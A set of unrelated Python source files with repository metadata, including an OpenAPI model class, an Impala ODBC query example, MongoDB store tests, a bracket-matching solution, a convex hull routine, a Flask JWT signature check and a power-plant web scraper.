609f208316babac07ccff737f84094897e5d863c | 59166105545cdd87626d15bf42e60a9ee1ef2413 | /dbpedia/models/unknown.py | dd1afb9f030bccf6a3766988d89ff96438847c90 | [] | no_license | mosoriob/dbpedia_api_client | 8c594fc115ce75235315e890d55fbf6bd555fa85 | 8d6f0d04a3a30a82ce0e9277e4c9ce00ecd0c0cc | refs/heads/master | 2022-11-20T01:42:33.481024 | 2020-05-12T23:22:54 | 2020-05-12T23:22:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,224 | py | # coding: utf-8
"""
DBpedia
This is the API of the DBpedia Ontology # noqa: E501
The version of the OpenAPI document: v0.0.1
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from dbpedia.configuration import Configuration
class Unknown(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'description': 'list[str]',
'id': 'str',
'label': 'list[str]',
'type': 'list[str]'
}
attribute_map = {
'description': 'description',
'id': 'id',
'label': 'label',
'type': 'type'
}
def __init__(self, description=None, id=None, label=None, type=None, local_vars_configuration=None): # noqa: E501
"""Unknown - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._description = None
self._id = None
self._label = None
self._type = None
self.discriminator = None
self.description = description
if id is not None:
self.id = id
self.label = label
self.type = type
@property
def description(self):
"""Gets the description of this Unknown. # noqa: E501
small description # noqa: E501
:return: The description of this Unknown. # noqa: E501
:rtype: list[str]
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this Unknown.
small description # noqa: E501
:param description: The description of this Unknown. # noqa: E501
:type: list[str]
"""
self._description = description
@property
def id(self):
"""Gets the id of this Unknown. # noqa: E501
identifier # noqa: E501
:return: The id of this Unknown. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this Unknown.
identifier # noqa: E501
:param id: The id of this Unknown. # noqa: E501
:type: str
"""
self._id = id
@property
def label(self):
"""Gets the label of this Unknown. # noqa: E501
short description of the resource # noqa: E501
:return: The label of this Unknown. # noqa: E501
:rtype: list[str]
"""
return self._label
@label.setter
def label(self, label):
"""Sets the label of this Unknown.
short description of the resource # noqa: E501
:param label: The label of this Unknown. # noqa: E501
:type: list[str]
"""
self._label = label
@property
def type(self):
"""Gets the type of this Unknown. # noqa: E501
type of the resource # noqa: E501
:return: The type of this Unknown. # noqa: E501
:rtype: list[str]
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this Unknown.
type of the resource # noqa: E501
:param type: The type of this Unknown. # noqa: E501
:type: list[str]
"""
self._type = type
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Unknown):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, Unknown):
return True
return self.to_dict() != other.to_dict()
| [
"maxiosorio@gmail.com"
] | maxiosorio@gmail.com |
fa1c32b002a192e0bd07992d6d5fd0beba4b6a66 | 28b48d7c0897ebb977ce867a82f6d963089e7e04 | /Python-examples/impala-pyodbc-example.py | 37096c311000dc6611110c1f33bb2b3079c89f06 | [
"Apache-2.0"
] | permissive | smaerkl/spark-impala-interfaces | 8343099331aafcdedfd4ffc7a9e2d11f41acaa66 | 675f11a471e897f8676227c7fa55fe280bb1d2ce | refs/heads/master | 2021-01-25T10:22:17.281288 | 2018-02-28T19:02:38 | 2018-02-28T19:02:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,078 | py | # Copyright 2018 Cloudera, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This script requires that the Impala ODBC driver is installed on the host
# Modify .odbc.ini and .odbcinst.ini before running
if sys.version_info[0] == 2:
!pip install pyodbc
else:
!pip3 install pyodbc
import pyodbc
import pandas as pd
con = pyodbc.connect('DSN=Impala DSN', autocommit=True)
sql = '''
SELECT origin,
COUNT(*) AS num_departures,
AVG(dep_delay) AS avg_dep_delay
FROM flights
WHERE dest = 'LAS'
GROUP BY origin
ORDER BY avg_dep_delay'''
pd.read_sql(sql, con)
| [
"icook@cloudera.com"
] | icook@cloudera.com |
1157b7b6ae259052ef1e69bb7e9e69f37b290851 | abd09d49466fc36968e379fb394347d2559b4240 | /src/data/utils_xmmty.py | aa115d60f8ec2fa09e23d2692065aa2d855bb04e | [
"MIT"
] | permissive | dypromise/insightface | 8077a1b5ae0f838fb1fa074b943fca6990cb74fb | 34df2d52f7ab5c3ddf54bc8834b4d5efb2a8b2bc | refs/heads/master | 2020-05-01T14:57:42.186122 | 2019-04-01T10:43:47 | 2019-04-01T10:43:47 | 177,533,893 | 0 | 0 | null | 2019-03-25T07:14:44 | 2019-03-25T07:14:44 | null | UTF-8 | Python | false | false | 530 | py | import shutil
import os
def rename_celebrity():
val_dir = '/home/xmmtyding/data1/celebrity_val_aligned/'
for _dir in os.listdir(val_dir):
_id = _dir
cnt = 0
this_dir = os.path.join(val_dir, _dir)
for file in os.listdir(this_dir):
_idx = "{:0>4d}".format(cnt)
name = _id + '_' + _idx + '.jpg'
cnt += 1
src = os.path.join(this_dir, file)
dst = os.path.join(this_dir, name)
os.rename(src, dst)
print("All done.")
| [
"nanhangdingyang@163.com"
] | nanhangdingyang@163.com |
9a3dff4505416c7621031482886acde695f4199e | bb00a3876ddb49dcea2cdc4bbd2356359260a563 | /poptimizer/evolve/tests/test_store.py | d20ee06f325caec712a7a86b4cc74674f8863523 | [
"Unlicense"
] | permissive | hraffiest/poptimizer | 1d2975acd0ecbe8466a7a1aa1bf631d12b4c9854 | 16bc9e056a6daa452d48cdac0dea5901e4a3d4a1 | refs/heads/master | 2023-04-21T02:29:06.259420 | 2021-05-05T14:33:03 | 2021-05-05T14:33:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,176 | py | from types import SimpleNamespace
import bson
import pymongo
import pytest
from poptimizer.evolve import store
@pytest.fixture(scope="module", autouse=True)
def set_test_collection():
# noinspection PyProtectedMember
saved_collection = store._COLLECTION
test_collection = saved_collection.database["test"]
store._COLLECTION = test_collection
yield
store._COLLECTION = saved_collection
test_collection.drop()
def test_get_collection():
collection = store.get_collection()
assert isinstance(collection, pymongo.collection.Collection)
assert collection.name == "test"
@pytest.fixture(scope="class", name="field_instance")
def make_field_and_instance():
field = store.BaseField()
instance = SimpleNamespace()
instance._update = {}
return field, instance
class TestBaseField:
def test_set_name_index(self):
field = store.BaseField(index=True)
field.__set_name__(SimpleNamespace, "some")
assert field._name == store.ID
def test_set_name(self, field_instance):
field, _ = field_instance
field.__set_name__(SimpleNamespace, "some")
assert field._name == "some"
def test_get_raise(self, field_instance):
field, instance = field_instance
with pytest.raises(AttributeError) as error:
field.__get__(instance, SimpleNamespace)
assert "'SimpleNamespace' object has no attribute 'some'" in str(error.value)
def test_set(self, field_instance):
field, instance = field_instance
field.__set__(instance, 42)
assert hasattr(instance, "some")
assert instance.some == 42
assert len(instance._update) == 1
assert instance._update["some"] == 42
def test_get(self, field_instance):
field, instance = field_instance
assert field.__get__(instance, SimpleNamespace) == 42
@pytest.fixture(scope="class", name="default_field_instance")
def make_default_field_and_instance():
field = store.DefaultField(53)
field.__set_name__(SimpleNamespace, "some")
instance = SimpleNamespace()
instance._update = {}
return field, instance
class TestDefaultField:
def test_unset_get(self, default_field_instance):
field, instance = default_field_instance
assert field.__get__(instance, SimpleNamespace) == 53
def test_set_get(self, default_field_instance):
field, instance = default_field_instance
field.__set__(instance, 64)
assert field.__get__(instance, SimpleNamespace) == 64
@pytest.fixture(scope="class", name="genotype_field_instance")
def make_genotype_field_and_instance():
field = store.GenotypeField()
field.__set_name__(SimpleNamespace, "some")
instance = SimpleNamespace()
instance._update = {}
return field, instance
class TestGenotypeField:
def test_set_not_genotype(self, genotype_field_instance):
field, instance = genotype_field_instance
field.__set__(instance, None)
rez = field.__get__(instance, SimpleNamespace)
assert isinstance(rez, store.Genotype)
assert isinstance(instance.some, store.Genotype)
assert rez is instance.some
def test_set_genotype(self, genotype_field_instance):
field, instance = genotype_field_instance
genotype = store.Genotype(None)
field.__set__(instance, genotype)
assert genotype is field.__get__(instance, SimpleNamespace)
assert genotype is instance.some
class TestDoc:
    """Lifecycle of store.Doc against the backing collection.

    NOTE(review): these tests share database state and rely on executing
    in definition order (create/save -> load -> update -> delete); do not
    run them individually or in parallel.
    """
    def test_new_doc_and_save(self):
        # A fresh Doc gets an ObjectId and defaults immediately, but only
        # touches the database on save().
        assert store.get_collection().count_documents({}) == 0
        genotype = store.Genotype()
        doc = store.Doc(genotype=genotype)
        assert store.get_collection().count_documents({}) == 0
        assert len(doc._update) == 2
        assert isinstance(doc.id, bson.ObjectId)
        assert doc.genotype is genotype
        assert doc.wins == 0
        assert doc.model is None
        with pytest.raises(AttributeError) as error:
            isinstance(doc.llh, bson.ObjectId)
        assert "object has no attribute 'llh'" in str(error.value)
        assert doc.date is None
        assert doc.timer == 0
        assert doc.tickers is None
        doc.save()
        assert store.get_collection().count_documents({}) == 1
        assert len(doc._update) == 0
    def test_load_wrong_doc(self):
        # Loading an id that is not in the collection raises IdError
        # mentioning the offending id.
        id_ = bson.ObjectId()
        with pytest.raises(store.IdError) as error:
            store.Doc(id_=id_)
        assert str(id_) in str(error.value)
    def test_load_doc(self):
        # Loading the document saved above restores fields and leaves the
        # pending-update buffer empty.
        db_doc = store.get_collection().find_one()
        doc = store.Doc(id_=db_doc[store.ID])
        assert len(doc._update) == 0
        assert doc.id == db_doc[store.ID]
        assert doc.genotype == db_doc["genotype"]
        assert doc.wins == 0
        assert doc.model is None
        with pytest.raises(AttributeError) as error:
            isinstance(doc.llh, bson.ObjectId)
        assert "object has no attribute 'llh'" in str(error.value)
        assert doc.date is None
        assert doc.timer == 0
        assert doc.tickers is None
    def test_load_doc_update_and_save(self):
        # Attribute writes accumulate in _update until save() flushes them;
        # a reload then sees the persisted values.
        db_doc = store.get_collection().find_one()
        doc = store.Doc(id_=db_doc[store.ID])
        assert len(doc._update) == 0
        doc.wins = 42
        doc.llh = 2.2
        doc.timer = 111
        assert len(doc._update) == 3
        doc.save()
        assert len(doc._update) == 0
        doc_loaded = store.Doc(id_=db_doc[store.ID])
        assert len(doc_loaded._update) == 0
        assert doc_loaded.id == db_doc[store.ID]
        assert doc_loaded.genotype == db_doc["genotype"]
        assert doc_loaded.wins == 42
        assert doc_loaded.model is None
        assert doc_loaded.llh == 2.2
        assert doc_loaded.date is None
        assert doc_loaded.timer == 111
        assert doc_loaded.tickers is None
    def test_delete(self):
        # delete() removes the single remaining document.
        assert store.get_collection().count_documents({}) == 1
        db_doc = store.get_collection().find_one()
        doc = store.Doc(id_=db_doc[store.ID])
        doc.delete()
        assert store.get_collection().count_documents({}) == 0
| [
"wlmike@gmail.com"
] | wlmike@gmail.com |
df1d21328fc7d36db4f0332cde27f441b36065d9 | 69198c187d7d3be82164acb1fa4dd5bad8b14a1f | /src/Lesson_100/lesson_08.py | 99bd3adceae62d18fb67a2448cd7bc334bd3bee3 | [] | no_license | dahai33/my_python | 64067633f99369fdffa680afff185f2fb579e4c8 | 56a49b79c61fce828225971a8e2855a95540f954 | refs/heads/master | 2020-03-21T09:11:46.640149 | 2018-08-06T16:29:55 | 2018-08-06T16:29:55 | 138,387,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,084 | py | # #!/usr/bin/python3
# #Author:刘海涛
# # --*-- coding: uft-8 --*--
# # @Time : 19:32
# #@字符串正则表达
# #字符串格式
# str="version3.0"
# # num=1.0
# # # sum =100
# # # format="%s" % str1
# # # #format="%s,%.4f,%%" %(str1,num,sum)
# # # format="%,%" % sum
# # # print(format)
# # print(str.center(20))
# # print(str.center(20,"*"))
# # print(str.rjust(30))
# # print(str.ljust(5))
# # print("%50s" % str)
# #字符串的转换
# path="liu\hai\tao\da\hai"
# # print(path)
# # print(len(path))
# # path=r"hellow\word\a"
# # print(path)
# # print(len(path))
# #去掉字符串中的转移符 strip() lstrip() rstip()
# # print(path)
# # print(path.strip())
# # print(path.lstrip())
# # print(path.rstrip())
# # 字符串的合并
# # str="liuhaitao"
# # str1="nice"
# # str2="good"
# # print(str + "%5s" % str1 + "%5s" % str2)
# # Strs=["hello","word","china"]
# # result="".join(Strs)
# # print(result)
# # from functools import reduce
# # import operator
# # re=reduce(operator.add,result,"")
# # print(re)
# # print(str[3:9])
# # st="bad nic: 1,2 3,5"
# # print(st.split())
# # print(st.split(","))
# # print(st.split(",",2))
# # s="a"
# # print(id(s))
# # print(id(s+"b"))
# ##字符串的比较 == !=
# # str="abc"
# # str1="abc"
# # str2="ABC"
# # if(str != str2):
# # print("nice")
# # else:
# # print("bad")
# #字符串的翻转
# # def reverse(s):
# # out=""
# # li=list(s)
# # for i in range(len(li),0,-1):
# # out +="".join(li[i-1])
# # return out
# # print(reverse("abcdsef"))
# #字符串的替换
# # str="this is a apple."
# # #头部开始查找
# # print(str.find("a"))
# # #尾部开始查找
# # print(str.rfind("a"))
# # #字符串的替换
# # str1="hello liu hai hello liu"
# # print(str1.replace("hello","nice",4))
# # print(str1.replace("liu","tao"))
# ##字符串和日期的转换
# # import time, datetime
# # print(time.strftime("%Y-%m-%d %X",time.localtime()))
# # print(time.localtime())
# #字符串的正则表达尺
# import re
"http://test-cookbook.readthedocs.io/en/latest/AndroidTest/index.html" | [
"liuhaitaodahai@sina.com"
] | liuhaitaodahai@sina.com |
e6087a9c1c28e76a6ddda6878925fca52382f776 | 36b2c96a233fad7bbe7ee2278567dc83e31cfa3e | /20.有效的括号.py | 4bf27fd3b85a12dee7db8c3fc4a78d92757afc2a | [] | no_license | CN-COTER/leetcode | 60f17274d876c7743c0eff299d0b8d045b79f336 | 3c1253daa4e85a68cb9ee341ea6cbe3708e31790 | refs/heads/master | 2023-01-19T20:32:18.087503 | 2020-12-01T09:11:57 | 2020-12-01T09:11:57 | 275,530,085 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 625 | py | #
# @lc app=leetcode.cn id=20 lang=python3
#
# [20] 有效的括号
#
# @lc code=start
class Solution:
    def isValid(self, s: str) -> bool:
        """Return True when every bracket in *s* nests and closes in order."""
        openers = {'(', '[', '{'}
        matching_opener = {'}': '{', ')': '(', ']': '['}
        pending = []  # stack of still-open brackets
        for ch in s:
            if ch in openers:
                pending.append(ch)
            elif not pending:
                # Closing bracket with nothing left open.
                return False
            elif pending.pop() != matching_opener[ch]:
                # Closing bracket does not match the most recent opener.
                return False
        # Valid only if every opener has been closed.
        return not pending
# @lc code=end
| [
"23699812+CN-COTER@users.noreply.github.com"
] | 23699812+CN-COTER@users.noreply.github.com |
0b3505f9997bf768ce97908ccef48d6cda641172 | a5d849f9d9daf2aaa85604ee5d45ccb6577e8127 | /flask_app/.env/bin/wheel | 3e570b1acc4af88d7b8bbf70ed34774777d16340 | [] | no_license | thecuongthehieu/Non-contact-Infrared-Thermometers-Project | 48ca3061a9c30a904441d293296723f760324b50 | aaa342e86f2bb3747593511afc4120c3dd48a42b | refs/heads/master | 2022-09-01T18:25:29.188304 | 2020-05-25T02:42:53 | 2020-05-25T02:42:53 | 263,975,556 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | #!/home/thecuong/Desktop/SE/flask_app/.env/bin/python2
# -*- coding: utf-8 -*-
import re
import sys
from wheel.cli import main
if __name__ == '__main__':
    # setuptools console-script shim: drop the "-script.pyw"/".exe" suffix
    # that Windows launchers append to argv[0], then run wheel's CLI and
    # propagate its exit status.
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"thecuongthehieu@gmail.com"
] | thecuongthehieu@gmail.com | |
ee7a30ed534036c38ac71e4aa8e959f2c127a862 | 251651b763c2588a0a6b65d8b23d93b195a91788 | /virtual/bin/gunicorn | 0b628ba141f066067c63f04acb73acfb5b4b36dc | [
"MIT"
] | permissive | AugustineOchieng/studio | b0f6feb14f7f3e1f65644bffbee9d2c3fe805c8f | ee7fb55fd2ad7046414a68872af98361719af42b | refs/heads/master | 2020-05-21T08:21:07.033975 | 2019-05-15T10:14:45 | 2019-05-15T10:14:45 | 185,977,336 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | #!/home/moringa/Desktop/studio/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from gunicorn.app.wsgiapp import run
if __name__ == '__main__':
    # setuptools console-script shim: normalise argv[0] (strip the
    # "-script.pyw"/".exe" launcher suffix), then start gunicorn's WSGI
    # app runner and propagate its exit status.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(run())
| [
"gusochieng@gmail.com"
] | gusochieng@gmail.com | |
70f629353a7de8b8fc4f753cff027ec7c15d8119 | c48e922b4ddd14a19d152ae1aff0aa276ed3fe0d | /cmp_cover_radio.py | d9235ff259620698576ae922b22ecae5cb3a1679 | [] | no_license | qbetter/normal_python_tool | 3623f973d25b290ae8bce73e807cdece793f7d51 | 1678116d4490bd887d3f8572a9e9c0ba67d0dec0 | refs/heads/master | 2021-07-14T00:52:06.323537 | 2020-06-24T06:26:38 | 2020-06-24T06:26:38 | 175,729,729 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,082 | py | #!/usr/bin/env python
#-*-coding:utf-8
import re
import os
import json
import time
import sys
reload(sys)
sys.setdefaultencoding('utf8')
def cmp_cover(merge_hot_file, uid_file):
    """Measure uid coverage of *merge_hot_file* against *uid_file*.

    uid_file holds one uid per line; merge_hot_file holds tab-separated
    lines whose first field is a uid.  Prints the hit count and the
    coverage ratio (hits / distinct uids) and returns the ratio.
    """
    # Build the reference uid set, skipping blank lines (the original kept
    # the empty string as a key, which made blank merge lines count as hits).
    with open(uid_file, 'r') as pub:
        uid_set = {line.strip() for line in pub if line.strip()}
    if not uid_set:
        # Guard the ZeroDivisionError the original hit on an empty uid file.
        print("uid file is empty, coverage undefined")
        return 0.0
    num = 0
    with open(merge_hot_file, 'r') as fd:
        for line in fd:
            uid = line.strip().split("\t")[0]
            if uid in uid_set:
                num = num + 1
    print("hit number is ", num)
    cover = float(num) / len(uid_set)
    # "radio" -> "ratio": fix the typo in the report line.
    print("cover ratio is ", cover)
    return cover
if __name__ == "__main__":
    # Compare the candidate uid file against the reference uid list.
    # (Original note, translated: remove synonyms from the recommended words.)
    merge_hot_file = "./have_age_uniq_uid"
    #merge_hot_file ="./../data/user_30day_buy_query_20190702_uid"
    #merge_hot_file ="./individual_hotword_file_uid"
    uid_file = "./uid_0614"
    cmp_cover(merge_hot_file,uid_file)
| [
"noreply@github.com"
] | qbetter.noreply@github.com |
6da4f31b24602a102458b063416568092a2a669e | dfda53a0563863953c3b6d84c4aea7e7a011eba8 | /死循环.py | 70a760f372781b29b1411256942ec0b27d87925a | [] | no_license | 1161976978/print | faeab2226173d4a3ea52ab631265792a5ff3a838 | edb9be4c1ca3af3cdf88c247ca4453124e0cf7d5 | refs/heads/main | 2023-03-21T01:16:52.839300 | 2021-03-19T14:39:51 | 2021-03-19T14:39:51 | 349,292,481 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68 | py | while True :
print('我爱你')
# CTAL+C 停止运行代码 | [
"77332743+15766320725@users.noreply.github.com"
] | 77332743+15766320725@users.noreply.github.com |
3f86754056689d08a519f2a79797332c97fa1366 | fcb94b0575d55b246a4e78dfec2610c9aceb836e | /tests/test_code/py/import_paths/abra.py | 046a90a0eb69f363cdbdc9eb6c947ebc79278f71 | [
"LGPL-2.0-or-later",
"MIT"
] | permissive | sarvex/code2flow | 1504fb0537ea17f486013e67958b4e17551f3a02 | 77375b90a09abd4b4d38167737d02ff4737a52aa | refs/heads/main | 2023-06-10T03:24:18.935595 | 2023-05-30T23:52:11 | 2023-05-30T23:52:11 | 33,498,323 | 0 | 0 | MIT | 2023-05-30T23:52:12 | 2015-04-06T18:33:55 | Python | UTF-8 | Python | false | false | 19 | py | def abra2():
pass
| [
"noreply@github.com"
] | sarvex.noreply@github.com |
db24784d0aab247ff173aa26481150febc78e352 | e3602f36cec6581098c6786d5dc9bda3cb914072 | /IntroductionWork/Graham.py | 291098492b7558a2291011eb13aae3f8dfe02aca | [] | no_license | dadi0/richang | c0821eaab89e85e113f36a8e25525f86d7e5fd6b | c63171ecfd390135b2079bbbd4876e8c63fbdd2c | refs/heads/master | 2020-04-02T08:35:35.279523 | 2020-02-26T08:07:19 | 2020-02-26T08:07:19 | 154,251,197 | 0 | 0 | null | 2019-02-08T05:27:02 | 2018-10-23T02:45:52 | null | UTF-8 | Python | false | false | 1,870 | py | import math
from operator import *
def area(ans_list):  # vertices must already be ordered along the hull boundary
    """Signed polygon area via a triangle fan anchored at the first vertex.

    Positive for counter-clockwise vertex order.  As in the original,
    the first two entries are consumed from ans_list (destructive).
    """
    anchor = ans_list.pop(0)
    prev = ans_list.pop(0)
    doubled = 0  # accumulates twice the signed area
    for cur in ans_list:
        ax = prev[0] - anchor[0]
        ay = prev[1] - anchor[1]
        bx = cur[0] - anchor[0]
        by = cur[1] - anchor[1]
        doubled += ax * by - bx * ay
        prev = cur
    return doubled / 2
def convex_hull(point_list):# points must already be sorted by polar angle (see psort)
    """Graham-scan hull walk; returns the hull's signed area via area().

    Returns -1 when fewer than 3 points are supplied.
    NOTE(review): destructively consumes point_list, and the pop loop has
    no guard against shrinking end_point below two entries (IndexError on
    degenerate/collinear input) -- confirm inputs before reuse.
    """
    if len(point_list) < 3:
        return -1
    end_point = point_list[:2]
    del point_list[:2]
    for i in point_list:
        # Cross product of the last hull edge with the candidate point.
        x1 = end_point[-1][0] - end_point[-2][0]
        y1 = end_point[-1][1] - end_point[-2][1]
        x2 = i[0] - end_point[-2][0]
        y2 = i[1] - end_point[-2][1]
        tag = x1 * y2 - x2 * y1
        while tag <= 0:
            # Non-left turn: drop the last hull vertex and test again.
            end_point.pop()
            x1 = end_point[-1][0] - end_point[-2][0]
            y1 = end_point[-1][1] - end_point[-2][1]
            x2 = i[0] - end_point[-2][0]
            y2 = i[1] - end_point[-2][1]
            tag = x1 * y2 - x2 * y1
        end_point.append(i)
    return area(end_point)
def psort(enter_list):
    """Order points for the hull walk and return convex_hull's result.

    Sorts in place by (y, x), takes the lowest point as pivot, orders the
    remaining points by polar angle around it (via descending cosine),
    collapses runs of equal angles, then feeds the reordered list to
    convex_hull.
    NOTE(review): for equal angles this keeps the *last* entry of each
    run, which is not necessarily the farthest point -- verify intent.
    """
    enter_list.sort(key=itemgetter(1, 0))
    point = enter_list[0]  # pivot: lowest y, ties broken by x
    tag1 = []  # (original index, -cos(angle to pivot)) pairs
    for i in range(1, len(enter_list)):
        lengthc = math.sqrt((enter_list[i][0]-point[0])**2+(enter_list[i][1]-point[1])**2)
        if lengthc == 0:
            continue  # duplicate of the pivot: skip it
        else:
            # Negated cosine so an ascending sort yields increasing angle.
            cos = (enter_list[i][0]-point[0])/lengthc
            tag1.append((i, -cos))
    tag1.sort(key=itemgetter(1))
    tag2 = []
    # Keep one representative per run of equal angles (the last of each run).
    for i in range(len(tag1)-1):
        if tag1[i][1] != tag1[i+1][1]:
            tag2.append(tag1[i])
    tag2.append(tag1[-1])
    tag3 = [0]  # pivot index goes first
    for i in range(len(tag2)):
        tag3.append(tag2[i][0])
    enter_list_sort = []
    for i in tag3:
        enter_list_sort.append(enter_list[i])
    return convex_hull(enter_list_sort)
| [
"44309668+dadi0@users.noreply.github.com"
] | 44309668+dadi0@users.noreply.github.com |
dcfb5ee9a48a74fb1f965e8cfc06719b83f04176 | 74dc27851303d24291c39a127e5575de24cec0b1 | /venv/bin/easy_install | 7c136c9aaae7569bb0767e5d4e38cce03d7bb5af | [] | no_license | lxherman/OtaPipDemo | 56d568919d94cab6e238a05e92a7337837cfb366 | ec614544532b2edec0f56fcf91f95909139d6b8a | refs/heads/master | 2023-06-23T05:09:23.401904 | 2021-07-22T03:57:22 | 2021-07-22T03:57:22 | 388,319,901 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 438 | #!/Users/macmini/Desktop/otavio_demo/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    # setuptools console-script shim: normalise argv[0] (drop the
    # "-script.pyw"/".exe" launcher suffix), then dispatch to the
    # 'easy_install' console_scripts entry point pinned to setuptools 40.8.0.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
    )
| [
"549622112@qq.com"
] | 549622112@qq.com | |
0c5d88473d4b5a6f23e8fb96f0e7bae6969ca868 | 5f9ca0fa06eb34965c7fe57d7e54adb9827694fd | /jwt/decode-jwt/app.py | 0772cc6c27a6b08cc6ed4eb1b5c2161bc76be518 | [
"Python-2.0",
"MIT"
] | permissive | OlgaMacko/vonage-python-code-snippets | b7d6037f1b47338731fec3fb37792dc8497f8bbb | 78eeaa256d0c11e23f05f72c3b2ab90bcbb6083c | refs/heads/master | 2023-06-25T04:20:03.962951 | 2021-07-07T14:34:54 | 2021-07-07T14:34:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 604 | py | import os
from flask import Flask, request
import jwt
VONAGE_API_KEY = os.getenv("VONAGE_API_KEY")
VONAGE_SIGNATURE_SECRET = os.getenv("VONAGE_SIGNATURE_SECRET")
VONAGE_SIGNATURE_SECRET_METHOD = os.getenv("VONAGE_SIGNATURE_SECRET_METHOD")
app = Flask(__name__)
@app.route("/", methods=['GET', 'POST'])
def callback():
    """Validate the signed JWT carried in the Authorization header.

    Always answers 200 with an empty body; the validation outcome is only
    logged, mirroring the original behaviour.
    """
    auth_header = request.headers.get("Authorization")
    if not auth_header:
        # A missing header used to raise TypeError (None[7:]) -> HTTP 500.
        print("Unable to validate signature")
        return '', 200
    token = auth_header[7:]  # strip the leading "Bearer " prefix
    try:
        # PyJWT 2.x requires the algorithms as a keyword list; the old
        # positional 'HS256' relied on deprecated 1.x behaviour.
        jwt.decode(token, VONAGE_SIGNATURE_SECRET, algorithms=["HS256"])
        print("Signature was validated")
    except Exception:
        # Was a bare except, which also swallowed SystemExit/KeyboardInterrupt;
        # keep the best-effort logging but only for real exceptions.
        print("Unable to validate signature")
    return '', 200
if __name__ == "__main__":
    # Flask development server; use a real WSGI server in production.
    app.run()
| [
"noreply@github.com"
] | OlgaMacko.noreply@github.com |
26b79b5f01eb9407b5cfed52526a34290b7604b2 | 3458958257e5cc5ec67ebac36b5d2e1523793f6b | /scrape_site.py | bed7af40d7b803e95367d053ec002b645b4e604f | [] | no_license | Tooblippe/power_scrape | 4af5a9a7f13164800df2d9cdd675d9b758787596 | f0355ebf2e3c81585bf54d61a1b8767a0aa17f99 | refs/heads/master | 2020-05-17T06:37:19.713585 | 2014-10-29T16:43:08 | 2014-10-29T16:43:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,749 | py | # -*- coding: utf-8 -*-
"""
Code to scrape website contents
Created on Wed Oct 22 19:36:30 2014
@author: tobie
"""
import pandas as pd
import requests
from lxml import html
# Python 2 scraping script: collects coal power-plant pages from
# globalenergyobservatory.org into a DataFrame and writes an .xls summary.
#empty container to save website rows in (one row per power plant)
data = pd.DataFrame()
#empty list for temp use
el = []
base_url = 'http://globalenergyobservatory.org/'
scrape_url = 'http://globalenergyobservatory.org/list.php?db=PowerPlants&type=Coal'
#read all the links to dataframe data
#-------------------------------------
page = requests.get(scrape_url)
dom = html.fromstring(page.text)
for link in dom.xpath('//a/@href'): # select the url in href for all a tags(links)
    if 'geoid' in link:  # plant-detail pages carry a geoid parameter
        print "found url: ",base_url+link
        el.append(base_url+link)
data['url'] = el
#traverse all pages and save each complete parsed page (DOM) to the dataframe
#we should do this in parallel using map
#puts everything in a dataframe...not sure this is a good idea
#idea was to pickle the dataframe...but did not work
#----------------------------------------------------------
el = []
for i, station_url in enumerate(data['url']):
    print station_url,
    page = requests.get(station_url)
    dom = html.fromstring(page.text)
    # NOTE(review): 1428 is presumably the expected page count; the
    # countdown is display-only -- confirm against the live listing.
    print 1428-i, 'to go'
    el.append(dom)
data['dom'] = el
#parse dom to find info
#uses xpath to get some info
#-scrape from DOM
data['description'] = data['dom'].apply(lambda x : x.xpath('//*[@class="wrapper"]/form[1]/div[1]/table[2]/tr/td/text()')[0])
data['name'] = data['dom'].apply(lambda x : x.xpath('//*[@id="Name"]/@value')[0])
